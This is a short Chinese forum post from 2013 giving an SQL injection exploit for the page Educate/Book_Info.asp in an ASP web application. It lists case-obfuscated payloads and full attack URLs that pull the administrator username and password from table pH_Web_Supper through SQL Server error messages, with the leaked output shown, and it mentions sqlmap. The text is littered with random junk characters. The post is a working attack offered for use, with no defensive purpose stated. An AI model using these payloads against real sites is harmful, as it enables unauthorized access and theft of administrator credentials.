漏洞出现在Educate/Book_Info.asp
* l$ ]! ~, h- m9 Y' F Y 4 l# c/ x1 B( C; ~2 F* R
此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出- b2 Z9 w7 P% k2 U
/ Z2 {/ v) H1 e! K2 I `- Nexp:如下
' X, n/ _8 J+ j0 E4 H3 t7 d6 | a9 `查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
$ S. K! M, Z m9 x( N查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)2 h: \ G# ~& H& w* G9 G
: O% F( |' j8 o2 r5 ?, |http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)7 {3 p V; J! O3 ~! n0 N
, @$ U/ P% W$ [Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
/ x6 _7 e" D5 m0 r
: }% x) S3 {& e9 X9 d- V将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。4 z1 w' W7 g' P! D
" y" O" a8 S" d# I3 X! q$ U8 m/Educate/Book_Info.asp,行 8
" j0 }- s5 t) O( w8 y$ x0 q+ _
9 ^4 [4 q# U4 t1 Z0 ihttp://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)0 S$ l0 Z+ [+ k8 X2 ?6 g
' T7 t( t! ~+ P, \/ t+ p7 Y- [
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'; Y& @( c# ^' ^3 t! P
2 `. V. H1 O$ x: T9 q5 g- ^将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。
+ z- o3 n" i. u* [; e8 q : _" m* j7 S4 @; B" w" G6 u, w
/Educate/Book_Info.asp,行 8# r! b" p+ T2 o6 v- G6 ~1 d/ u, X
|
发表于 2013-2-16 21:44:16
收藏
支持
反对